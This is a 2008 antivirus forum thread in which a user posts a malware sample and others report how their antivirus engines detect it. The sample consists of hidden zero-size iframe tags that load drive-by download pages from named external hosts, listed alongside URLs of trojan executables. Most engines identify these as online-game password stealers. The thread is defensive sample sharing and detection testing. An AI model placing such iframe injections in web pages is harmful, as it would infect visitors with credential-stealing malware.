查看: 3261|回复: 10
收起左侧

[病毒样本] 忘记哪个帖子的网址里提出来的了

[复制链接]
zzh161
发表于 2008-1-13 22:09:11 | 显示全部楼层 |阅读模式
<iframe src="http://qi.ccbtv.net/hu.htm" width=0 height=0></iframe>     http://js.users.51.la/1465313.js
<iframe src="http://um.uuzzvv.com/uu.htm" width=0 height=0></iframe>
<iframe src="http://fa.55189.net/" width=0 height=0></iframe>
<iframe src="http://bn.jqxx.org/40.htm" width=0 height=0></iframe>      http://js.users.51.la/1586580.js
<iframe src="http://az.sbb22.com/hh.htm" width=0 height=0></iframe>     http://count17.51yes.com
<iframe src=http://ppp.749571.com/dm/diao.htm width=1 height=1></iframe>  http://dd.749571.com/bb/bd.cab,014.exe
<iframe src=http://ppp.749571.com/dm/rl.htm width=1 height=1></iframe>    http://dd.749571.com/bb/newrl.exe
<iframe src=http://ppp.749571.com/dm/rr.htm width=1 height=1></iframe>    http://is.749571.com/bb/a.exe
<iframe src=http://ppp.749571.com/dm/test.htm width=1 height=1></iframe>  http://dd.749571.com/bb/test.exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ye221017
发表于 2008-1-13 22:12:20 | 显示全部楼层
难道有5个毒  费尔报4个
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>014.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>bd.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>newrl.exe        Trojan.Cap81110.dwdl        木马        还未处理
C:\Documents and Settings\Administrator\桌面\新建文件夹.rar>>test.exe        Trojan.Cap81110.dwdl        木马        还未处理
当空皓月
发表于 2008-1-13 22:17:55 | 显示全部楼层
kis7.00.125
已删除:木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件 : C:\Documents and Settings\hp\桌面\新建文件夹.rar/014.exe//PE_Patch//UPack
已删除:木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件 : C:\Documents and Settings\hp\桌面\新建文件夹.rar/bd.exe//PE_Patch//UPack
已删除:木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件 : C:\Documents and Settings\hp\桌面\新建文件夹.rar/newrl.exe//PE_Patch//UPack
已删除:木马程序 Trojan-PSW.Win32.OnLineGames.noi        文件 : C:\Documents and Settings\hp\桌面\新建文件夹.rar/test.exe//PE_Patch//UPack

好像就4个,剩下的那个用红伞扫,safe

[ 本帖最后由 futuregj 于 2008-1-13 22:19 编辑 ]
ye221017
发表于 2008-1-13 22:18:34 | 显示全部楼层
a-squared3.0.0.1262008.01.122008-01-12-
3.743
AntiVir7.6.0.467.0.1.2272008-01-11TR/PSW.OnlineGames.noi
4.362
Arcavir1.0.42008011309382008-01-13Heur.Win32.I
4.456
AVAST1.0.8080112-02008-01-12-
1.786
AVG7.5.50.442269.19.2/12222008-01-13PSW.OnlineGames.ABDT
3.064
BitDefender7.60825.9705027.168742008-01-13-
10.927
CA (VET)9.0.0.14331.3.54512008-01-12Win32/Zuten!generic trojan.
15.044
ClamAV 0.91.254792008-01-13PUA.Packed.UPack-2
0.027
Comodo2.112.0.0.4032008-01-13-
1.288
CP Secure1.1.0.6952008.01.132008-01-13Troj.PSW.W32.OnLineGames.noi
13.270
Dr.WEB4.44.0.91702008.01.132008-01-13-
10.435
ewido4.0.0.22008.01.122008-01-12-
3.327
F-PROT4.4.1.52200801122008-01-12Possible W32/Heuristic-162!Eldorado (damaged, not disinfectable)
3.567
F-SECURE5.51.61002008.01.12.012008-01-12Trojan-PSW.Win32.OnLineGames.noi [AVP]
6.052
IKARUST3.1.01.152008.01.13.701362008-01-13-
0.776
MKS_VIR2.012008.01.132008-01-13Heur.Win32
5.948
NOD322.70.1027872008-01-12-
0.503
NORMAN5.91.085.902008-01-11W32/Suspicious_U.gen
8.389
nProtect2008-01-11.0011208202008-01-11Trojan-Downloader/W32.Small.6748
4.785
PrevxV2200801132008-01-13-
12.581
QuickHeal9.002008.01.122008-01-12Suspicious - DNAScan
4.250
SOPHOS2.49.14.212008-01-08Mal/Dropper-Y
16.618
The Hacker6.2.9v001862008-01-11W32/Behav-Heuristic-060
1.284
VBA323.12.2.520080112.22452008-01-12-
7.650
ViRobot200801112008.01.112008-01-11-
0.990
VirusBuster4.3.19:99.119.4/11.02008-01-12Packed/Upack
3.716
卡巴斯基5.5.102008.01.132008-01-13Trojan-PSW.Win32.OnLineGames.noi
15.272
安博士V32008.01.12.002008.01.122008-01-12-
1.328
江民杀毒10.00.6502008.01.072008-01-07-
1.583
熊猫卫士9.04.03.00012008.01.122008-01-12Suspicious file
3.444
瑞星19.020.26.52.002008-01-12Trojan.PSW.Win32.OnlineGames.GEN
1.918
赛门铁克1.3.0.2420080112.0032008-01-12Infostealer
0.313
趋势8.500-10014.942.512008-01-13TSPY_ONLINEG.BPN
0.040
迈克菲5.2.0052052008-01-11New Malware.aj
7.709
金山毒霸2007.6.20.2492008.1.132008-01-13Win32.PSWTroj.Win32.77964
2.165
飞塔2.81-3.118.6212008-01-13W32/Dropper.NOI!tr.pws
2.329
qigang
发表于 2008-1-13 22:20:26 | 显示全部楼层

6/4

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.PSW.Win32.OnlineGames.GEN

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.26.62
jimmyleo
发表于 2008-1-13 22:24:09 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
spaceplane
发表于 2008-1-13 22:28:34 | 显示全部楼层
nod居然一个都没扫出.....
包里5个,一个都没查出,说明被针对过


金山扫出4个

[ 本帖最后由 spaceplane 于 2008-1-13 22:32 编辑 ]
taiw_1144
发表于 2008-1-13 22:41:59 | 显示全部楼层
微点报四个

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\014.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\BD.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\NEWRL.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.gtm

程序:
C:\DOCUMENTS AND SETTINGS\WO\LOCAL SETTINGS\TEMP\RAR$EX00.531\TEST.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
剑书
头像被屏蔽
发表于 2008-1-13 23:07:12 | 显示全部楼层
Begin scan in 'K:\新建文件夹.rar'
K:\新建文件夹.rar
  [0] Archive type: RAR
  --> 014.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> bd.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> newrl.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
  --> test.exe
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.noi
      [INFO]      A backup was created as 'ad1187eb.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
hkt988
发表于 2008-1-13 23:42:12 | 显示全部楼层
NOD32右键扫描不报,运行时杀了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-2-4 04:56 , Processed in 0.086257 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表